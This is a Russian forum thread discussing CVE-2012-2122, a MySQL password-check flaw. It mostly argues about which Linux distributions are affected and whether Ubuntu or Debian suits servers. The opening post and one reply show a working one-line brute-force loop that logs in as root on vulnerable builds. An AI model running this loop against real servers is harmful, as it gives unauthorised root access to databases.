LINUX.ORG.RU

CVE-2012-2122: китайский метод взлома MySQL

 , ,


4

4

Китайцы взломали сервер Пентагона. Каждый китаец попробовал один пароль. Каждый второй пароль был «Мао Цзедун». На 74357181-й попытке- сервер согласился,что у него пароль «Мао Цзедун».

!Ъ: CVE-2012-2122: A Tragically Comedic Security Flaw in MySQL

Ъ:

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

mysql>

Перемещено tazhate из talks

★★★★★

Последнее исправление: beastie (всего исправлений: 1)

Ответ на: комментарий от Shtsh

Ещё в Федоре и Арче.

кто-то воспроизвёл? Deb тоже _заявлен_ как уязвимый, но это ложь.

drBatty ★★
()
Ответ на: комментарий от xtraeft

ну ты бы хоть описание уязвимости почитал - может тогда понял бы откуда ноги растут.

кто тебе сказал, что я не читал?

но вместо этого ты сделал гениальный вывод 'убунту дырявое, моя слака на локалхосте безопасна'

моя слака на локалхосте 32х битная, т.ч. в ней и так не работает. А вот на серверах с 64ю битным дебом я проверял - эффект отрицательный.

drBatty ★★
()
Ответ на: комментарий от z00ke

Дополнение: проверка версий MySQL

ключи компиляции, патчи, и прочее мы не учитываем? Где результаты _тестов_ с положительным эффектом? Я их не вижу.

drBatty ★★
()
Ответ на: комментарий от drBatty

а, ну да, там только Debian Unstable имеет такую дыру.

drBatty ★★
()
Ответ на: комментарий от drBatty

Да, воспроизведены, и еще раз повторяю только в 64-разрядных Ubuntu, OpenSuSE 12.1, Fedora 16 и Arch Linux. И вообще, Ubuntu Server это очень хороший вариант для организации сервера, всякие Gentoo/Arch там точно не пойдут :) так что не надо тут.

z00ke
()
Ответ на: комментарий от z00ke

1. Да, воспроизведены, и еще раз повторяю только в 64-разрядных Ubuntu, OpenSuSE 12.1, Fedora 16 и Arch Linux.

2.Ubuntu Server это очень хороший вариант для организации сервера, всякие Gentoo/Arch там точно не пойдут :)

да уж... Утверждение №1 очень хорошо подтверждается утверждением №2...

drBatty ★★
()

кстати, а если на уязвимом сервере установлен phpmyadmin, то сработает-ли данная уязвимость? Насколько я понимаю, для mysql php является кагбэ локальным? Не?

drBatty ★★
()
Ответ на: комментарий от drBatty

да уж... Утверждение №1 очень хорошо подтверждается утверждением №2...

оно хорошо подтверждается тем, что в репозиторий уже пришла исправленная версия, а насчет уязвимостей - они есть везде, дебиан не исключение, вот список за этот год:

http://www.debian.org/security/2012/

wota ★★
()
Ответ на: комментарий от z00ke

что «узнал»? убунту на сервер ставят как раз именно одмины локалхоста. Как и любую нестабильную систему (в т.ч. и арч)

drBatty ★★
()
Ответ на: комментарий от wota

оно хорошо подтверждается тем, что в репозиторий уже пришла исправленная версия, а насчет уязвимостей - они есть везде, дебиан не исключение, вот список за этот год:

http://www.debian.org/security/2012/

ага. вот и я о том - админ бубунты юзает постоянно sudo с дырой, а админ debian'а этим дырявым sudo не пользуется в большинстве случаев, в этом-то вся и разница. По умолчанию в серверной инсталляции Debian обычно sudo и нету, в отличие от бубунты, где это основной инструмент администрирования. И так - во всём.

drBatty ★★
()
Ответ на: комментарий от drBatty

Что за чушь? Ты бы выяснил сначала, а потом чушь нес. Ты, видимо, ни разу сервер не держал серьезный и не ставил Ubuntu server, так что лучше сиди и помалкивай.

z00ke
()
Ответ на: комментарий от drBatty

Почитай для начала это и это, например, а вообще, Ubuntu Server, как серверный дистрибутив, самая наиприятнейшая штука, и, в отличии от тебя, мне приходилось одминисть достаточно популярный ресурс.

z00ke
()
Ответ на: комментарий от drBatty

вот и я о том - админ бубунты юзает постоянно sudo с дырой, а админ debian'а этим дырявым sudo не пользуется в большинстве случаев

этот баг давно исправлен, и он был не критичен - его можно было использовать только при специальных условиях, а вот брутфорс для пользователя root - никто не отменял

По умолчанию в серверной инсталляции Debian обычно sudo и нету

по-умолчанию много чего нет

И так - во всём.

ага, в серверной инсталляции Debian наверное обычно нет apache, php, postgre, bind, libxml2 и т.д., просто идеально защищенный сервер

wota ★★
()
Ответ на: комментарий от z00ke

Почитай для начала это и это, например

это ты своему будущему работодателю показывай, мне-то зачем? я не собираюсь платить тебе с Марком денег за установку твоей бубунты.

drBatty ★★
()
Ответ на: комментарий от wota

этот баг давно исправлен, и он был не критичен - его можно было использовать только при специальных условиях

вот так всегда... Дай тогда список критичных неисправленных дыр. Ты никогда не задумывался о том, что ты являешься бетатестером стабильной ветки Debian'а? Это конечно почётно, я тоже тестирую недоделанную slackware-current в которой тоже есть и баги, и дыры, но зачем unsable в продакшен ставить?

а вот брутфорс для пользователя root - никто не отменял

1. ты устанешь брутофорсить мои пароли, типа u(leyovrgtjBbrAu3by4

2. удалённо все нормальные люди вообще запрещают вход root'а. Ибо не нужно.

ага, в серверной инсталляции Debian наверное обычно нет apache, php, postgre, bind, libxml2 и т.д., просто идеально защищенный сервер

ты сам сказал, что данные баги некритичны и давно исправлены. Не? Кстати, в серверной бубунте и в нестабильном дебе дыра из первого поста есть, а вот в стабильном дебиане её нет. О чём это говорит?

drBatty ★★
()
Ответ на: комментарий от drBatty

Ты никогда не задумывался о том, что ты являешься бетатестером стабильной ветки Debian'а?

я еще и разработчиком являюсь, чувствую себя нормально

удалённо все нормальные люди вообще запрещают вход root'а

используют sudo? ;)

О чём это говорит?

о более старом софте в debian stable

wota ★★
()
Ответ на: комментарий от wota

я еще и разработчиком являюсь, чувствую себя нормально

это таким «разработчиком», который php код из mcedit по ssh прямо на серваке правит? Я тоже таким был, к счастью - давно. Теперь у меня есть тестовые сервера для опытов.

используют sudo? ;)

su. Но это уже локально. Тебе, что-бы побрутофорсить, ещё и войти как-то надо, а у меня вход удалённый всегда без пароля, по ключу.

о более старом софте в debian stable

и что в этом плохого? недоделанная juju отсутствует? как-нибудь перебьюсь, апдейтил я сотни серверов и без всякого juju, и ничего. Вот как Марк свою жужу допилит - будем посмотреть.

drBatty ★★
()
Ответ на: комментарий от drBatty

это таким «разработчиком», который php код из mcedit по ssh прямо на серваке правит?

нет, конечно, я вообще прикладное ПО и библиотеки имел ввиду, а не локальный php код где-то у вас на сервере, который вы редактируете

и что в этом плохого?

далеко не все багфиксы бэгпортируются, взять тот же mysql - у ниг достаточно много исправлений и улучшений постоянно коммитятся, и получить их можно только со следующим релизом

wota ★★
()
Ответ на: комментарий от wota

нет, конечно, я вообще прикладное ПО и библиотеки имел ввиду, а не локальный php код где-то у вас на сервере, который вы редактируете

я к тому, что на сервер надо стабильную систему ставить, которая меняется ТОЛЬКО в случае нахождения критических уязвимостей.

далеко не все багфиксы бэгпортируются, взять тот же mysql - у ниг достаточно много исправлений и улучшений постоянно коммитятся, и получить их можно только со следующим релизом

ну и зачем мне такие улучшения? Мой код, который использует новые возможности либы X не будет работать со старой версией X. Это довольно неудобно - не везде и не всегда я могу просто так взять, и проабгрейдить либу X, без риска, что что-то где-то отвалится. Такие вещи не волнуют как раз таки только админов локалхоста, у которых такой проблемы нет в принципе. Да и «улучшения» часто спорные - простой пример: использование сжатия xz вместо gzip. Оно конечно намного лучше, но и памяти кушает в сотни и тысячи раз больше, мне что, ещё и железо прикажете менять? Потому-то и использую старую и проверенную OS, где неожиданностей быть не может. И current на локалхосте - ну сломается - так сломается, хрен с ней.

drBatty ★★
()
Ответ на: комментарий от vadik

Хм.

Дополнение: проверка версий MySQL поставляемых в дистрибутивах показала, что уязвимости подвержены пакеты для 64-разрядных выпусков Ubuntu Linux (с 10.04 по 12.04), OpenSuSE 12.1, Fedora 16 и Arch Linux. Не подвержены уязвимости официальные сборки с сайтов проектов, а также пакеты из состава Red Hat Enterprise Linux, CentOS, выпусков Ubuntu для 32-разрядных систем, Debian Linux (Squeeze, Lenny), Gentoo 64-bit.

Можно начинать холивар: чей дистрибутив круче :).

vahtu
()
Ответ на: комментарий от drBatty

я к тому, что на сервер надо стабильную систему ставить, которая меняется ТОЛЬКО в случае нахождения критических уязвимостей.

Ubuntu Server LTS

ну и зачем мне такие улучшения?

вы случайно пропустили слово «багфиксы» и основную мысль - версии того же mysql просто так не скачут, и на один баг подобный тому, что мы тут обсуждали, приходятся десятки исправленных багов, и если CVE-2012-2122 исправили за один день, то исправления этих багов никто бэкпортировать не будет, часть из них - да, но далеко не все

wota ★★
()

Трагичней только та штука в grub2, которая проверяла настоящий и вводимый пароль на наличие непустой общей подстроки.

melkor217 ★★★★★
()
Ответ на: комментарий от wota

вы случайно пропустили слово «багфиксы» и основную мысль - версии того же mysql просто так не скачут, и на один баг подобный тому, что мы тут обсуждали, приходятся десятки исправленных багов

дык они не критичны, эти десятки багов...

drBatty ★★
()
Ответ на: комментарий от AptGet

Недостаточно мертвый, чтобы сравнивать его с локалхостом.

ну это как посмотреть... лично мне вообще глубоко поровну до рамблера, я там уже больше года не был.

drBatty ★★
()
Ответ на: комментарий от drBatty

дык они не критичны, эти десятки багов...

да ладно, например в версии 5.5, которая была уязвима и в дебиане, были исправлены многочисленные баги, где для запросов возвращались неверные результаты, где запрос не отрабатывал, креша и т.д., нефига себе некритичные баги :)

wota ★★
()
Ответ на: комментарий от BeerSeller

O_o сработало

Дистрибутив и версию в студию. Мы тут потестировали - на всех вариациях генты (включая разные версии кальки), на провайдерских гентах - нигде не работает.

LightDiver ★★★★★
()
Ответ на: комментарий от BeerSeller

Это на рабочей машине тестовая база. На боевом cерваке с debian 6 не работает.

BeerSeller ★★★★
()

УМНР

[16:01] fletch@helix ~\ $ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
[16:01] fletch@helix ~\ $ uname -a Linux helix 3.3.6-1-ARCH #1 SMP PREEMPT Sun May 13 10:52:32 CEST 2012 x86_64 GNU/Linux

Fletch ★★
()
8 июня 2013 г.
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.